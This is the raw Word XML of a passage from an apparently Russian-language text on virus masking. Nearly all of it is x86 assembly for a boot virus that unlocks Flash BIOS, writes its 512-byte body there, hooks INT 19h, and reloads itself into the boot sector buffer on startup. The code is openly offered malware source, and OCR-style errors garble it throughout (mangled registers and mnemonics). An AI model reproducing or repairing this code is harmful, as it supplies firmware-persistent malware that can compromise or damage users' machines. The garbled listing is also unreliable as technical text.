          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Разрешаем запись во Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov al,7</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 16h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Копируем 512 байт вируса во Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push ds</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pop es</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>xor di.di</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ex,512</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push cs</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pop ds</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>xor si,si</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>eld</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">rep movsb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3десь нужна особая осторожность. lnt19h указывает на BIOS,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;позднее оно перехватывается различными программами.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.Если трассировать его, можно наткнуться на закрытую область</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;или на сегмент 70h, но этого не будет при загрузке. Понятно,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;что это единственное удачное время для выполнения вируса.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;Все, что нужно - "внедриться" в int19h.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;Можно перехватить его в том месте, где находится</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>сохраненная таблица векторов, но сделаем интереснее.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.Получим смещение оригинального обработчика int19h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov bx.es ;ВХ=сегмент вируса</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">xor ах.ах </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov ds.ax ;DS=Ta6nHua векторов</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov di.word ptr [19h*4] ;Смещение INT 19h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov es.word ptr [19h*4+2] ;Сегмент INT 19h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3апишем JMP FAR по адресу точки входа в INT 19h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov al.OEAh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">stosb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov ax,offset int19handler</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">stosw </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov ax.bx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">stosw </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Понизим напряжение</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,OE004h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 16h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3ащитим Flash BIOS от записи</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov al,6</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 16h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Проверим, сохранялось ли состояние чипа, если нет - выходим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmp byte ptr cs:chipset,0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jne No_Flash_BIOS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Восстановим состояние чипа</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push cs</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pop es</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov al,3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov di, offset buffer</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int 16h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jmp No_Flash_BIOS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Флаг несохранения состояния чипа</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">chipset db 0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Флаг присутствия вируса во Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">flash_done db 0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Наш обработчик INT 19h.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">lnt19Handler Proc Near </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Установим сегментный регистр ES в ноль</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>хог ах.ах</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov es.ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Проверим наличие резидентного вируса</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax.OABBAh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Если вирус присутствует, то запускаем оригинальный</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[обработчик прерывания INT 19h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp ax.OBAABh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jne realJnt19h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Перенесем вирус из BIOS в boot-буфер</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push cs</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">pop ds </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eld </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">xor si,si </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov di,7c00h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ex,512 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">rep movsb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;3апустим вирус в boot-буфере </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov dl,80h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>jmp goto_Buffer</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Real_int19h: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Произведем сброс дисковой подсистемы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>xor ax,ax</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Лроинициализируем значения регистров для загрузки boot-сектора</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ex, 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov dh,0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,0201h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov bx,7COOh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Проверим, откуда грузимся: если DL не нулевой,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;переходим к загрузке с жесткого диска </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp dl,0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">J'a hd_int19h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Прочтем boot-сектор с дискеты. Если при чтении происходит</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;ошибка, то читаем с жесткого диска </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">int 13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jc fix_hd </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Остановим флаг, показывающий присутствие вируса во Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Goto_Buffer: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov byte ptr es:[7COOh+offset flash_done],1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;3апустим boot-сектор, находящийся в boot-буфере </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">db OEAh ;Код команды JMP FAR </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dw 7c00h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>dw 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Fix_HD: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Установим номер диска для загрузки (диск С) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov dl,80h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">HD_lnt19h: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Произведем сброс дисковой подсистемы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>хог ах,ах</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Прочтем boot-сектор</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,0201h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int 13h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>jc Boot</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jmp Goto_Buffer </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Если не удалось загрузить boot-сектор,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.вызываем прерывание INT 18h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Boot: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>int 18h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>lnt19Handler EndP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Flash_BIOS EndP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">End_Virus: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Размер области памяти, необходимый для дополнения</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;размера вируса до 510 байт</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">DupSize equ 510-offset End_Virus </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Заполнение незанятой вирусом части сектора</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>db DupSize dup (0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">db 55h,0aah </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Место для сохранения состояния чипа</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Buffer: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="009C190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663C"/>
    <w:rsid w:val="000D1847"/>
    <w:rsid w:val="002C1831"/>
    <w:rsid w:val="009C190D"/>
    <w:rsid w:val="00D5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</o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val=","/>
  <w:listSeparator w:val=";"/>
  <w14:defaultImageDpi w14:val="0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1925B258-AFEE-4F71-9E7C-F904EB19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32363</Words>
  <Characters>18447</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>153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МАСКИРОВКА ВИРУСОВ</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>KM</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>50709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МАСКИРОВКА ВИРУСОВ</dc:title>
  <dc:subject/>
  <dc:creator>N/A</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-27T12:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-01-27T12:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>